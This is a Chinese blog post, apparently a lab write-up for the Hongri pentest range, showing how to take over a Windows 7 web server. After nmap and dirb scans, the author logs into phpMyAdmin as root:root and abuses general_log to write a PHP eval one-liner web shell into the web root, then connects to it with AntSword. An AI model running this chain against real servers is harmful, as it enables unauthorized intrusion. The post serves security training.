当前位置: 首页 > article >正文

【渗透测试】-红日靶场-获取web服务器权限

拓扑图:

前置环境配置:

Win 7

默认密码:hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡:

虚拟机->设置-> 添加->网络适配器

保存,打开win 7并重启:

查看ip地址:

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试:

方法一:phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令:nmap -sn  192.168.145.0/24

全端口扫描

命令:nmap -A -p 1-65535 192.168.145.129

80端口->  开放  http服务

3306端口->开放 mysql服务

目录扫描

命令:dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/ 

登录验证:

192.168.145.129:80

泄露:

路径:C:/phpStudy/WWW

使用弱口令进行数据库连接:

root:root

http://192.168.145.129/phpmyadmin/ 

登录->sql。

第一步 查询日志 命令: show variables like '%general%';

发现日志写入系统关闭,需要打开。

命令: set global general_log='on';     

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马:

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'     

验证:http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。


http://www.kler.cn/news/359870.html

相关文章:

  • Linux -- 命名管道
  • ansible——ansible的变量
  • Typescript中的Required,Partial,Pick,Omit辅助类型
  • Python爬取站长素材图片【爬虫学习day.01】
  • Android Framework关闭触摸振动
  • Vue笔记-浏览器窗口改变时,重新计算表格高度并设置
  • 【OpenCV】人脸识别方法
  • 32.第二阶段x86游戏实战2-遍历技能2(技能二叉树基址)
  • WPF中的<Style.Triggers>
  • 项目管理软件真的能让敏捷开发变得更简单吗?
  • 【2024CANN训练营第二季】使用华为云体验AscendC_Sample仓算子运行
  • 【华为HCIP实战课程十六】OSPF虚链路Vlink,网络工程师
  • 代码随想录算法训练营第三十一天|56. 合并区间、738.单调递增的数字
  • Typora的使用方法(个人学习笔记)
  • 03 springboot-国际化
  • Lambda架构保持批处理和实时处理之间的数据一致性
  • Vite:功能
  • 基于webpack的react多页面项目框架
  • PHP echo、print_r、print、var_dump之间的区别
  • Qt 窗口悬停事件和鼠标跟踪